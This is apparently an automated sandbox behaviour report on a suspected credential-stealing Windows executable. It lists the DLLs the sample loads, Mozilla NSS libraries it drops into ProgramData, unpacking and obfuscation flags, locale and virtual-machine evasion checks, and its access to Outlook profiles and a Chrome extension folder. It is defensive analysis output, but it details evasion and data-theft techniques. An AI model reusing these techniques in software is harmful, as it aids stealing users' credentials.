Source: unknown Process created: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe "C:\Users\user\Desktop\Wb9LZ5Sn1l.exe"
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 2900
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Wb9LZ5Sn1l.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137541385.000000006CCDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: C:\golopelipuniba\juye\sezuboniledi\kog_fuwahirah 90\dipone.pdb source: Wb9LZ5Sn1l.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137541385.000000006CCDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Unpacked PE file: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Unpacked PE file: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
PE file contains sections with non-standard names
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004176C5 push ecx; ret 0_2_004176D8
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC9B536 push ecx; ret 0_2_6CC9B549
Drops PE files
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe API coverage: 6.1 %
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00401120 GetSystemInfo,ExitProcess, 0_2_00401120
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: GHDHDGHJ.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: GHDHDGHJ.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002BF4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware7
Source: GHDHDGHJ.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: GHDHDGHJ.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: GHDHDGHJ.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: GHDHDGHJ.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GHDHDGHJ.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: GHDHDGHJ.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
